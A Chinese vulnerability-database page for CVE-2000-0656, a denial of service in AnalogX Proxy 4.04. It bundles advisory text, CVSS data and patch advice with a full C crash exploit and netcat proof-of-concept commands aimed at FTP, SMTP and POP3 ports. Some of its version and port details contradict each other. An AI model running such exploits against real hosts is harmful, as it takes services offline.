CVE-2000-0656
CVSS5.0
发布时间 :2000-07-25 00:00:00
修订时间 :2008-09-10 15:05:32
NMCOES    

[原文]Buffer overflow in AnalogX proxy server 4.04 and earlier allows remote attackers to cause a denial of service via a long USER command in the FTP protocol.


[CNNVD]AnalogX Proxy DoS漏洞(CNNVD-200007-066)

        AnalogX proxy server 4.04及其之前版本存在缓冲区溢出漏洞。远程攻击者借助FTP协议中的超长USER命令导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0656
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0656
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-066
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1504
(VENDOR_ADVISORY)  BID  1504
http://archives.neohapsis.com/archives/bugtraq/2000-07/0360.html
(VENDOR_ADVISORY)  BUGTRAQ  20000724 AnalogX Proxy DoS
http://www.analogx.com/contents/download/network/proxy.htm
(UNKNOWN)  CONFIRM  http://www.analogx.com/contents/download/network/proxy.htm

- 漏洞信息

AnalogX Proxy DoS漏洞
中危 缓冲区溢出
2000-07-25 00:00:00 2006-09-25 00:00:00
远程  
        AnalogX proxy server 4.04及其之前版本存在缓冲区溢出漏洞。远程攻击者借助FTP协议中的超长USER命令导致服务拒绝。

- 公告与补丁

        This vulnerability has been addressed in the latest version of the AnalogX Proxy server which is available at:
        http://www.analogx.com/contents/download/network/proxy.htm

- 漏洞信息 (20099)

AnalogX Proxy 4.0 4 DoS Vulnerability (EDBID:20099)
windows remote
2000-07-25 Verified
0 wildcoyote
N/A [点击下载]
source: http://www.securityfocus.com/bid/1504/info

AnalogX Proxy is a simple proxy server that allows a user to connect a network of computers to the internet through the proxy gateway. Many of the services provided contain buffer overrun vulnerabilities that can allow an attacker to crash the proxy server remotely. The FTP, SMTP, POP3 and SOCKS services are vulnerable to a denial of service attack by sending especially long arguments to certain commands. 

/*

 AnalogX Proxy DoS by wildcoyote@coders-pt.org

 Accoding to bugtraq advisory....
 Bugtraq id    : 1504
 Object        : Proxy.exe (exec) 
 Class         : Boundary Condition Error 
 Cve           : GENERIC-MAP-NOMATCH 
 Remote        : Yes 
 Local         : No 
 Published     : July 25, 2000 
 Vulnerable    : AnalogX Proxy 4.4
 Not vulnerable: AnalogX Proxy 4.6
                 AnalogX Proxy 4.5

 Words: Bastards, they killed kenny!

*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>


struct analogXDoS_types {
  char *service;
  int port;
  char *command;
  int overflow_string_size;
};

struct analogXDoS_types analogXDoS_types[]={
  {"AnalogX FTP Proxy ",21,"USER BO@userfriendly.org\n",370}, 
  {"AnalogX SMTP Proxy",25,"HELO BO@userfriendly.org\n",370},
  {"AnalogX POP3 Proxy",110,"USER BO@userfriendly.org\n",370},
  {NULL,0,NULL,0}
};



int
openhost(char *host,int port) {
   int sock;
   struct sockaddr_in addr;
   struct hostent *he;
   he=gethostbyname(host);
   if (he==NULL) return -1;
   sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
   if (sock==-1) return -1;
   memcpy(&addr.sin_addr, he->h_addr, he->h_length);
   addr.sin_family=AF_INET;
   addr.sin_port=htons(port);
   if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1;
   return sock;
}

void
sends(int sock,char *buf) {
  write(sock,buf,strlen(buf));
}

void
analogXcrash(char *host, int type)
{
 char *buf;
 int sock, i, x, buffer_size;
 printf("Type Number: %d\n",type);
 printf("Service    : %s\n",analogXDoS_types[type].service);
 printf("Port       : %d\n",analogXDoS_types[type].port);
 printf("Let the show begin ladyes...\n");
 printf("Connecting to %s [%d]...",host,analogXDoS_types[type].port);
 sock=openhost(host,analogXDoS_types[type].port);
 if (sock==-1)
 {
  printf("FAILED!\n");
  printf("Couldnt connect...leaving :|\n\n");
  exit(-1);
 }
 printf("SUCCESS!\n");
 printf("Allocating memory for buffer...");
 buffer_size=(strlen(analogXDoS_types[type].command)
             +
             analogXDoS_types[type].overflow_string_size);
 if (!(buf=malloc(buffer_size)))
 {
  printf("FAILED!\n");
  printf("Leaving... :[\n\n");
  exit(-1);
 }
 printf("WORKED! (heh)\n");
 for(i=0;;i++)
  if ((analogXDoS_types[type].command[i]=='B') &&
      (analogXDoS_types[type].command[i+1]=='O')) break;
  else buf[i]=analogXDoS_types[type].command[i];
 for(x=0;x<analogXDoS_types[type].overflow_string_size;x++) strcat(buf,"X");
 i+=2;
 for(;i<strlen(analogXDoS_types[type].command);i++)
    buf[strlen(buf)]=analogXDoS_types[type].command[i];
 printf("Sending EVIL buffer ;)\n");
 sends(sock,buf);
 close(sock);
 printf("Heh...that host should be a gonner by now ;)\n");
 printf("Was it good for you to? :)\n\n");
}

void
show_types()
{
 int i;
 for(i=0;;i++)
 {
  if (analogXDoS_types[i].service==NULL) break;
  printf("Type Number: %d\nService : %s Port : %d Overflow string size : %d\n",i
        ,analogXDoS_types[i].service
        ,analogXDoS_types[i].port
        ,analogXDoS_types[i].overflow_string_size);
 }
}

main(int argc, char *argv[])
{
 int i;
 // lets keep on (int) var i the number of types ;)
 for(i=0;;i++) if (analogXDoS_types[i].service==NULL) break;
 i--; // oh my god, cant forget that'array[0] thingie! :))
 printf("\n\t\tAnalogX Proxy v4.4 DoS by wildcoyote@coders-pt.org\n\n");
 if (argc<3) {
    printf("Sintaxe: %s <host> <type number> [port]\n",argv[0]);
    show_types();
    printf("\n*Enjoy*...\n\n");
 }
 else if (atoi(argv[2])<=i)
       if (argc==3) analogXcrash(argv[1],atoi(argv[2]));
       else {
           analogXDoS_types[atoi(argv[2])].port=atoi(argv[3]);
           analogXcrash(argv[1],atoi(argv[2]));
       }
      else
      {
        printf("Invalid type value (max type=%d)\n",i);
        printf("Type %s for more information :)\n\n",argv[0]);
      }
}
		

- 漏洞信息

3668
AnalogX Proxy USER Command Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

AnalogX Proxy contains a flaw that allows a remote attacker to crash the server. The issue is due to a buffer overflow condition in the FTP service. By sending a USER command containing 370 or more characters to port 21, an attacker will crash the server.

- 时间线

2000-06-25 Unknow
2000-06-25 Unknow

- 解决方案

Upgrade to version 4.05 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

AnalogX Proxy DoS Vulnerability
Boundary Condition Error 1504
Yes No
2000-07-25 12:00:00 2009-07-11 02:56:00
This vulnerability was first reported in an advisory released by Foundstone Inc. on July 25, 2000 which credits Robin Keir (robin.keir@foundstone.com) and Stuart McClure (stuart.mcclure@foundstone.com) with the discovery.

- 受影响的程序版本

AnalogX Proxy 4.0 4
AnalogX Proxy 4.0 6
AnalogX Proxy 4.0 5

- 不受影响的程序版本

AnalogX Proxy 4.0 6
AnalogX Proxy 4.0 5

- 漏洞讨论

AnalogX Proxy is a simple proxy server that allows a user to connect a network of computers to the internet through the proxy gateway. Many of the services provided contain buffer overrun vulnerabilities that can allow an attacker to crash the proxy server remotely. The FTP, SMTP, POP3 and SOCKS services are vulnerable to a denial of service attack by sending especially long arguments to certain commands.

- 漏洞利用

The Foundstone, Inc. advisory which reported this issue included the following instructions for demonstrating the problem. The full text of this advisory is available in the 'Credits' section of this vulnerability.

Proof of concept

Sending an FTP "USER" command containing approximately 370 or
more characters to the proxy server FTP TCP port 21 will crash
it.

Example #1: nc 192.168.1.2 21 &lt; ftp.txt

Where ftp.txt contains:
"USER [long string of ~370 chars]@isp.com"

Sending an SMTP "HELO" command containing approximately 370 or
more characters to the proxy server SMTP TCP port 25 will
crash it.

Example #2: nc 192.168.1.2 21 &lt; smtp.txt

Where smtp.txt contains:
"HELO [long string of ~370 chars]@isp.com"

Sending a POP3 "USER" command containing approximately 370 or
more characters to the proxy server POP3 TCP port 110 will
crash it.

Example #3: nc 192.168.1.2 21 &lt; pop3.txt

Where pop3.txt contains:
"USER [long string of ~370 chars]@isp.com"

Sending a SOCKS4 "CONNECT" request with an overly large user
ID field of roughly 1800 characters or more to the proxy
server SOCKS TCP port 1080 will crash it.

Example #4: nc 192.168.1.2 1080 &lt; socks.dat

Where socks.dat contains binary data with a user ID field of
approx. 1800 bytes.

- 解决方案

This vulnerability has been addressed in the latest version of the AnalogX Proxy server which is available at:

http://www.analogx.com/contents/download/network/proxy.htm

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站